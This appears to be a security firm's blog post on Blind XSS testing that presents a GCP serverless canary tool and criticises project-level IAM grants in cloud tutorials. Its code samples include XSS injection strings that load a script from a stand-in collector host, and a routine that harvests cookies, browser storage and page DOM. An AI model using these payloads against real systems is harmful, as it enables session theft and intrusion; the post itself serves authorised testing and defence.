An Intro to Blind XSS & Secure GCP Functions

During a recent engagement, I ran across a potential instance of Blind Cross-Site Scripting (XSS) while pentesting a web application. I followed my typical methodology of using a Burp Collaborator endpoint as my canary and observing whether simple HTML tags would load arbitrary content. I observed a successful HTTP connection from a <script> tag that was executed by a separate backend process during a contact form submission. Unfortunately, I was never able to reproduce the issue, no matter how many times I resubmitted my payload. My best guess is that a backend user or automated software interacted with my payload once, then ignored the rest of my requests. As a result, I could not adequately describe the impact of this finding to our client. Was it a true positive Blind XSS? Or was an automated process observing my payload and performing a sandbox analysis against it? The only data I had was the source IPs of the HTTP connections within Burp Collaborator… or basically no data at all.

GCPXSSCanary

Overall, I was unprepared for my attack to be successful on the first try, not realizing I would only have one shot at exploitation. I needed to remedy this issue for future engagements.

The project I would ultimately create is GCPXSSCanary, which can be found on our White Oak Security GitHub repository.

Blind XSS

Blind Cross-Site Scripting (XSS) [1] is a form of XSS where the payload is not executed in the front-end application. Instead, the payload traverses the application stack and may execute in back-end logging, transactional, or other service applications.

For instance, a front-end web application may implement a customer service feedback form available to all users. When a user submits their feedback, the text content is sent via backend services to a completely separate ticketing application, where customer service representatives are assigned tickets and respond to the feedback. In a security assessment scoped to the front-end application, it may not be possible to access the backend ticketing platform. However, by using Blind XSS testing techniques, a security assessor can submit a payload in the front-end application that executes in the backend application and notifies the assessor of the successful XSS execution.
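As a rough illustration of what such a payload can look like, the sketch below builds a few common injection strings that all load a remote script from a collector the assessor controls. The `buildCanaryPayloads` helper and the `collector.example` URL are hypothetical names chosen for this example and are not taken from any specific tool.

```javascript
// Hypothetical helper: build a few Blind XSS canary strings that load a
// remote script from a collector the assessor controls.
function buildCanaryPayloads(collectorUrl) {
  // Validate early so a typo does not silently produce a dead payload.
  const url = new URL(collectorUrl);
  if (url.protocol !== "https:") {
    throw new Error("collector URL should use https");
  }
  const src = url.href;
  return [
    // Plain script include, for contexts that render raw HTML.
    `<script src="${src}"></script>`,
    // Break out of an attribute value first.
    `"><script src="${src}"></script>`,
    // Event-handler variant for contexts that strip <script> tags.
    `<img src=x onerror="var s=document.createElement('script');s.src='${src}';document.head.appendChild(s)">`,
  ];
}

const payloads = buildCanaryPayloads("https://collector.example/p.js");
payloads.forEach((p) => console.log(p));
```

Which variant fires, if any, depends entirely on how the backend application renders the submitted text, so in practice several variants are usually submitted.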

What Tools Currently Exist?

There have been several projects over the years to assist with Blind XSS exploitation, ranging from standalone software to a couple of serverless projects. Burp Collaborator [2] is a widely used XSS canary within Burp Suite, generating a unique URL to monitor for simple DNS/HTTP connections. The most well-known project is BeEF [3], which is still actively maintained. BeEF is self-hosted and provides many advanced capabilities around user interaction during exploitation, as well as a UI to interact with sessions. While BeEF is powerful, many of its more interesting features have been neutralized by browser updates over the years or require a victim to interact and run malicious plugins. It is still a valuable tool, and I highly recommend checking the project out to see if it fits into your workflow.

Other notable projects can be found on GitHub by searching for the blind-xss topic [4]. The most popular are ezXSS [5], bXSS [6], and the deprecated Sleepy Puppy [7]; a serverless project, xless [8], also appears to be quite popular. The first three tools all achieve the same goal and provide a self-hosted Blind XSS collection experience. The xless tool moves beyond the self-hosted model: it relies on a third party to host the serverless functions and uploads images to a free image host. I did find proof-of-concept tools for both AWS [9] and Azure [10]; however, I did not find anything built for Google Cloud Platform (GCP).

Room For Improvement?

The existing projects for exploiting Blind XSS are great, but they all share a few major problems that keep them from fitting into my current workflow.

- Self-Hosted: I do not want to maintain the server infrastructure for a piece of software as simple as serving content and observing inbound data.

- Confidentiality: I do not want to rely on third parties (outside of the big three cloud providers) for the storage of our client’s sensitive screenshots.

- Complexity: I do not need a dedicated web UI front end to view the results of my Blind XSS collection. I really only need a notification and the ability to view the results, such as through a chat program.

- Availability: I want the ability to spin up or tear down my infrastructure with a single command or as part of an automated pipeline.

Blind XSS Tools





Every Blind XSS tool delivers a near-identical payload that retrieves the following data from the client’s (victim) browser session:

- URL

- User-Agent

- HTTP Referrer

- Origin

- Document Location

- Browser DOM

- Browser Time

- Cookies (Without HTTPOnly)

- LocalStorage

- SessionStorage

- IP Address



- Screenshot
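A minimal sketch of how the browser-side items in this list can be gathered is shown below. The function name `collectSessionData` and the stub objects are assumptions made for illustration. The IP address is normally observed by the collector server-side, and a screenshot typically needs an additional rendering library, so both are left out here.

```javascript
// Sketch of the collection step. `win` is a window-like object so the
// function can run in a browser (pass `window`) or be exercised with a stub.
function collectSessionData(win) {
  const doc = win.document;
  // Copy a Storage-like object into a plain object.
  const dumpStorage = (storage) => {
    const out = {};
    for (let i = 0; i < storage.length; i++) {
      const key = storage.key(i);
      out[key] = storage.getItem(key);
    }
    return out;
  };
  return {
    url: doc.URL,
    userAgent: win.navigator.userAgent,
    referrer: doc.referrer,
    origin: win.location.origin,
    documentLocation: win.location.href,
    dom: doc.documentElement.outerHTML,
    browserTime: new Date().toISOString(),
    cookies: doc.cookie, // HttpOnly cookies are never visible to script
    localStorage: dumpStorage(win.localStorage),
    sessionStorage: dumpStorage(win.sessionStorage),
  };
}

// Usage with a stub; in a browser this would be collectSessionData(window).
const stubStorage = (items) => {
  const keys = Object.keys(items);
  return { length: keys.length, key: (i) => keys[i], getItem: (k) => items[k] };
};
const stubWindow = {
  location: { href: "https://tickets.example/view/42", origin: "https://tickets.example" },
  navigator: { userAgent: "ExampleBrowser/1.0" },
  document: {
    URL: "https://tickets.example/view/42",
    referrer: "",
    cookie: "theme=dark",
    documentElement: { outerHTML: "<html></html>" },
  },
  localStorage: stubStorage({ token: "abc" }),
  sessionStorage: stubStorage({}),
};
const report = collectSessionData(stubWindow);
console.log(report.url, Object.keys(report.localStorage));
```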

In addition to these core payload features, I also wanted to be able to determine the ‘uniqueness’ of the executing browser. To accomplish this, I can simply hook into a client-side browser fingerprinting library [11] to obtain a consistent fingerprint across browser sessions, to a decent degree of accuracy.

Google Cloud Functions (GCF)

In addition to the above reasons for improving upon these projects, I also wanted to expand my knowledge of Google Cloud Platform (GCP) from a developer’s perspective. This perspective will in turn help improve my cloud security skills by identifying some common pitfalls that developers can fall into when building applications quickly without prioritizing Identity & Access Management (IAM).

This brings us to Google Cloud Functions (GCF) [12], which is one of Google Cloud’s serverless offerings. GCF will allow us to create our Serverless architecture while still maintaining control over the confidentiality of our data.



To deliver and collect from our Blind XSS payloads, we can create a simple cloud service architecture:

- Self-Hosted: We will use GCP Serverless architecture so that we do not have to maintain our infrastructure, domain name, or TLS certificates.

- Confidentiality: We will be storing our screenshots in Google Cloud Storage (GCS) rather than on a third-party image-sharing server, or within our destination notification platform (in this case, Slack). We could additionally retrieve our XSS session cookies & browser storage data in a similar fashion.

- Complexity: Serverless cloud architecture allows you to rapidly make changes and deploy code quickly. We will be leveraging a pre-existing frontend notification framework (Slack or Google Chat) to use as our UI, rather than building a whole UI & authentication framework for our data.



- Availability: We will be using Terraform to perform the deployments to GCP, allowing us to spin up and tear down our infrastructure with a single command.
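To make the collection side of this architecture more concrete, here is a minimal sketch of an HTTP handler in the Express-style `(req, res)` shape that HTTP-triggered Cloud Functions use on the Node.js runtime. It is not the GCPXSSCanary source: `makeCollectHandler` and the `onReport` callback are hypothetical names, and the permissive CORS policy is an assumption based on payloads firing from arbitrary origins.

```javascript
// Factory for an Express-style (req, res) handler. `onReport` is a
// hypothetical callback that would store the screenshot and send the
// chat notification.
function makeCollectHandler(onReport) {
  return function collect(req, res) {
    // Payloads fire from arbitrary origins, so allow cross-origin POSTs.
    res.set("Access-Control-Allow-Origin", "*");
    if (req.method === "OPTIONS") {
      res.set("Access-Control-Allow-Methods", "POST");
      res.set("Access-Control-Allow-Headers", "Content-Type");
      return res.status(204).send("");
    }
    const body = req.body;
    if (req.method !== "POST" || body === null || typeof body !== "object") {
      return res.status(400).send("bad request");
    }
    // The client IP is observed server-side rather than reported by the payload.
    const forwarded = String(req.headers["x-forwarded-for"] || "");
    const ip = forwarded.split(",")[0].trim() || req.ip || "unknown";
    onReport({ ...body, ip, receivedAt: new Date().toISOString() });
    return res.status(204).send("");
  };
}
```

Passing the storage and notification logic in as a callback keeps the handler small and lets it be exercised locally with stubbed request and response objects before anything is deployed.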

Note: We could use GCP App Engine to deploy ezXSS or any of the other Blind XSS projects as a Docker container, but my issue is that those projects are a bit too ‘heavy’ with regard to their dependence on a UI and authentication framework. Improving upon those projects would be more work than just creating my own application.

As far as our JavaScript XSS payload is concerned, we will be performing all of the collections previously discussed inside our payload body. In addition, we will be using Node.js templates to inject dynamic content into our payload (such as the collection URL or client name) without having to craft an overly complex system. Having a dynamic payload will allow us to chain this utility with other cloud pipeline services in the future, for example as part of automated web application assessments.
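The templating idea can be sketched with plain placeholder substitution. This is a stand-in for whichever template mechanism the project actually uses; the `renderPayload` helper, the `{{name}}` placeholder syntax, and the example values are all assumptions for illustration.

```javascript
// Minimal placeholder substitution: replaces {{name}} with a safely quoted
// JavaScript string literal built from vars[name].
function renderPayload(template, vars) {
  return template.replace(/\{\{\s*(\w+)\s*\}\}/g, (match, name) => {
    if (!Object.prototype.hasOwnProperty.call(vars, name)) {
      throw new Error(`missing template variable: ${name}`);
    }
    // JSON.stringify yields a quoted, escaped string literal.
    return JSON.stringify(String(vars[name]));
  });
}

const template = [
  "(function () {",
  "  var collectUrl = {{collectUrl}};",
  "  var client = {{clientName}};",
  "  // ...collection logic would go here...",
  "})();",
].join("\n");

const rendered = renderPayload(template, {
  collectUrl: "https://collector.example/collect",
  clientName: 'Acme "Test" Corp',
});
console.log(rendered);
```

Quoting each value with `JSON.stringify` rather than pasting it in raw means a client name containing quotes cannot break the generated script.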



Since we are using Google Cloud Storage (GCS), we can also retrieve the screenshot data through a signed URL, using temporary credentials minted by our cloud function’s service account. This allows us to post our notification message to Slack with an embedded image URL, without having to store the image on Slack itself. A data retention policy cleans up these images by deleting them after a period of time, and the images are encrypted at rest.
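As a hedged sketch of the signed URL step: the `@google-cloud/storage` client exposes `getSignedUrl` on a file object, which resolves to an array whose first element is the URL. The helper names, the 15-minute default lifetime, and the stub file below are assumptions for illustration; in a real function `file` would come from something like `new Storage().bucket(bucketName).file(objectName)`.

```javascript
// Build options for a short-lived, read-only V4 signed URL.
function signedUrlOptions(nowMs, ttlMinutes) {
  // V4 signed URLs cannot be valid for longer than 7 days.
  if (ttlMinutes <= 0 || ttlMinutes > 7 * 24 * 60) {
    throw new RangeError("ttlMinutes must be between 1 minute and 7 days");
  }
  return { version: "v4", action: "read", expires: nowMs + ttlMinutes * 60 * 1000 };
}

// `file` is expected to behave like a File object from @google-cloud/storage.
async function screenshotUrl(file, ttlMinutes = 15) {
  const [url] = await file.getSignedUrl(signedUrlOptions(Date.now(), ttlMinutes));
  return url;
}

// Usage with a stub in place of a real GCS file object.
const stubFile = {
  getSignedUrl: async (opts) => [`https://storage.example/shot.png?expires=${opts.expires}`],
};
screenshotUrl(stubFile, 15).then((url) => console.log(url));
```

A short lifetime limits how long a leaked chat message can expose the screenshot, at the cost of older notifications no longer rendering their image.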

On Slack, our chatbot posts messages using an API key stored as an environment variable within the function. Once a new payload event occurs, a Slack message is posted to our channel and we can view the results of our Blind XSS with an associated screenshot.
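The notification step might look roughly like the following, using Slack's `chat.postMessage` Web API method with Block Kit `section` and `image` blocks. The function names, the report fields, and the `SLACK_BOT_TOKEN` variable name are hypothetical; `fetch` is assumed to be available globally (Node.js 18 or later).

```javascript
// Build the chat.postMessage body for one Blind XSS report.
function buildSlackMessage(channel, report, screenshotUrl) {
  const summary = [
    `*Blind XSS fired* for \`${report.client}\``,
    `*URL:* ${report.url}`,
    `*User-Agent:* ${report.userAgent}`,
    `*IP:* ${report.ip}`,
  ].join("\n");
  return {
    channel,
    text: `Blind XSS fired on ${report.url}`, // plain-text fallback
    blocks: [
      { type: "section", text: { type: "mrkdwn", text: summary } },
      {
        type: "image",
        image_url: screenshotUrl, // e.g. a signed GCS URL
        alt_text: "Screenshot of the page where the payload executed",
      },
    ],
  };
}

// Post the message; the token is read from a hypothetical environment variable.
async function postToSlack(message, token = process.env.SLACK_BOT_TOKEN) {
  const response = await fetch("https://slack.com/api/chat.postMessage", {
    method: "POST",
    headers: {
      Authorization: `Bearer ${token}`,
      "Content-Type": "application/json; charset=utf-8",
    },
    body: JSON.stringify(message),
  });
  return response.json();
}

const message = buildSlackMessage(
  "#xss-canary",
  { client: "acme", url: "https://tickets.example/view/42", userAgent: "ExampleBrowser/1.0", ip: "203.0.113.7" },
  "https://storage.example/shot.png"
);
console.log(JSON.stringify(message, null, 2));
```

Because the URL and User-Agent are attacker-influenced strings, a production version would likely want to escape Slack's control characters before embedding them in `mrkdwn` text.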

Lastly, we wrap the entire build process in a Terraform script to spin up and tear down our resources when needed.



The final result, created in cloud functions whenever we need this resource available:

You can experiment with the GCP XSS Canary project on our White Oak Security GitHub repository [13].

A Special Note About IAM Bad Practices

As mentioned at the beginning of this blog post, when I was researching permission management while building this application I was trying to use the perspective of a ‘first-time’ cloud developer. This developer may not have all the security best practice knowledge, especially when it comes to cloud resources. This is a developer who would rely on public tutorials and official documentation in order to build their minimum viable product. Lastly, this developer may not have a gigantic team of well-versed engineers who are familiar with the cloud, or cloud architects to enforce these boundaries. I used this mindset because I wanted to understand some of the potential origins for IAM policy misconfigurations, related to public resources.

What I observed was a widespread lack of emphasis on security boundaries and IAM permissions, with few practical demonstrations of the principle of least privilege. My references mostly consisted of Google’s official documentation, StackOverflow, Terraform’s documentation, and public tutorials (including lots of Medium articles). Additionally, it was a struggle to find good examples of IAM done well, even in simple proof-of-concept projects, without having to seek them out with specific search terms.

Now, it’s a bit unfair to say that these resources do not exist for the security-conscious developer. A developer who has followed every step of the various Google Cloud Platform (GCP) tutorials will be very familiar with the term “least privilege”, as it is referenced in most advanced tutorials. In addition, GCP’s documentation for each individual service contains a lengthy article on IAM and appropriate permissions. However, these principles are not brought up from the very start when creating your first service; they tend to come up further down the road, when looking into advanced topics. As a result, it’s easy for a developer to stray from best practices right out of the gate.

By skipping the IAM discussion article, a developer will rely on the baked-in Google service account that is created by default when creating a cloud function or Cloud Run application. This service account has “editor” permissions across a majority of cloud services and should be disabled. Doing so is a best practice, but it is not mentioned until you open the IAM article [14] and look into the service account permissions. A compromise of one cloud service using this service account opens up the possibility for an attacker to gain access to almost every other cloud service, due to the wide reach of these default permissions.

One of the biggest misconfigurations, especially when it came to automated permission management via Terraform, was setting IAM access at the “project” level rather than at the individual service level. This is a pretty basic misconfiguration, since Google sets up its default service accounts with these permissions, and it is commonly seen throughout public tutorials. An example from Medium that appears on the first page of Google results, covering how to generate a signed URL for bucket storage data [15], can be seen below. The author incorrectly applies the “google_project_iam_member” Terraform resource to the service account, allowing the service account to create service tokens across the entire project, rather than just for the service account itself. Since the service account only needs access to its own account to generate a signed GCS bucket URL, it’s completely unnecessary to apply this permission at the project level.

![Terraform example from a public tutorial that applies the google_project_iam_member resource to a service account at the project level](https://blog.cyberadvisors.com/hubfs/Imported_Blog_Media/p5Az9HOhzIqo6_kjEuuLMLNlCWx8KA-I34du_2Y9leYvAENkMvz0PXhrBVIw72H1eRcmjVsbIJtl0cx53UrwbbKc9-HQkLiiRp7xwPFTrdP3sf82ac0mnP5II0GTyeaXWkplrpXVc4mXsrQib2DOJbgqyqGpx3-G1r1Bh2_84y8ZblZrv94BcB_gyg.png)

Additionally, I noticed a handful of other tutorials following similar practices when adding permissions for service accounts using Terraform for their cloud functions or Cloud Run services. When permissions are applied at the project level rather than at the function level, a compromise of one function results in the attacker inheriting all assigned permissions across every other cloud service.

If I were a novice to IAM and cloud security, I would be following these tutorials without realizing how ‘open’ I was making my environment. Of course, when developing in the cloud, IAM and permissions should be the very first topic that is covered and taught in depth, but I would guess this is not always the case.

Terraform Checks

The good news for the proactive developer is that several tools exist to help vet Terraform misconfigurations, such as tfsec [16]. When I replicated the issue above, tfsec flagged it as a potential path to privilege escalation, which is great to see.

![tfsec output flagging the project-level IAM grant as a potential path to privilege escalation](https://blog.cyberadvisors.com/hubfs/Imported_Blog_Media/OYaNPRkZOcM2022T-5Tg9qS0feyETQUOzeq0lOL_3ciRsx8DzcxvfGLJXG2v5MCmfuGuQyRkJ-w0VBqbj10ZnvapHJbNZn0_D7jaE2L83CJQuK5-C3MbW9GOH4m3aI3cE6iWB9_f2UGUzUkSPTAhwYFnKLgqPa5NnaK1a6XxxSZnXOuAqzDvPd4gZQ.png)
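To illustrate the kind of check involved, the sketch below scans the JSON form of a Terraform plan (as produced by `terraform show -json`) for broad roles granted through project-level IAM resources. This is not how tfsec is implemented; the `findProjectLevelGrants` helper, the list of roles, and the sample plan are assumptions made for this example.

```javascript
// Roles that are risky when granted to a service account project-wide.
const RISKY_ROLES = new Set([
  "roles/iam.serviceAccountTokenCreator",
  "roles/iam.serviceAccountUser",
  "roles/editor",
  "roles/owner",
]);
const PROJECT_LEVEL_TYPES = new Set(["google_project_iam_member", "google_project_iam_binding"]);

// `plan` is the parsed output of `terraform show -json <planfile>`.
function findProjectLevelGrants(plan) {
  return (plan.resource_changes || [])
    .filter((rc) => PROJECT_LEVEL_TYPES.has(rc.type))
    .filter((rc) => rc.change && rc.change.after && RISKY_ROLES.has(rc.change.after.role))
    .map((rc) => ({ address: rc.address, role: rc.change.after.role }));
}

// Hypothetical plan: one project-wide grant and one scoped to a single
// service account, which is the narrower alternative.
const samplePlan = {
  resource_changes: [
    {
      address: "google_project_iam_member.token_creator",
      type: "google_project_iam_member",
      change: { after: { role: "roles/iam.serviceAccountTokenCreator" } },
    },
    {
      address: "google_service_account_iam_member.self_token_creator",
      type: "google_service_account_iam_member",
      change: { after: { role: "roles/iam.serviceAccountTokenCreator" } },
    },
  ],
};

const findings = findProjectLevelGrants(samplePlan);
console.log(findings);
```

Only the project-level grant is reported; the same role bound through `google_service_account_iam_member` applies to a single service account and passes the check.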

Blind XSS Conclusion

Overall, Blind XSS can be a forgotten vulnerability in the eyes of penetration testers. Simple canary methods, such as Burp Collaborator, can be useful during testing, but if you don’t have the infrastructure ready to capture the results of the vulnerability, you won’t be able to adequately identify the risk it may pose to the environment. By using a serverless architecture, such as Google Cloud Functions (GCF), we at White Oak Security are able to monitor and exploit Blind XSS with relative ease while still protecting our clients’ data.

Sources:

1. https://owasp.org/www-community/attacks/xss/ – XSS Overview

2. https://portswigger.net/burp/documentation/collaborator – Burp Collaborator

3. https://github.com/beefproject/beef – BeEF Framework Project Page

4. https://github.com/topics/blind-xss – Blind-XSS GitHub projects

5. https://github.com/ssl/ezXSS – ezXSS Project Page

6. https://github.com/LewisArdern/bXSS – bXSS Project Page

7. https://github.com/Netflix-Skunkworks/sleepy-puppy – Sleepy Puppy Project Page

8. https://github.com/mazen160/xless – Xless Project Page

9. https://github.com/JKme/ass – AWS Blind XSS Project Page

10. https://github.com/dgoumans/Azure-xless – Azure Xless Project Page

11. https://github.com/fingerprintjs/fingerprintjs – FingerprintJS Project Page

12. https://cloud.google.com/functions – GCF Overview

13. https://github.com/whiteoaksecurity/gcpxsscanary – GCP XSS Canary Project Page

14. https://cloud.google.com/iam/docs/service-accounts#default – IAM Service Accounts Overview

15. https://blog.bavard.ai/how-to-generate-signed-urls-using-python-in-google-cloud-run-835ddad5366 – Bad IAM Terraform Example

16. https://aquasecurity.github.io/tfsec/v1.19.0/ – Terraform Security Scanner Project Page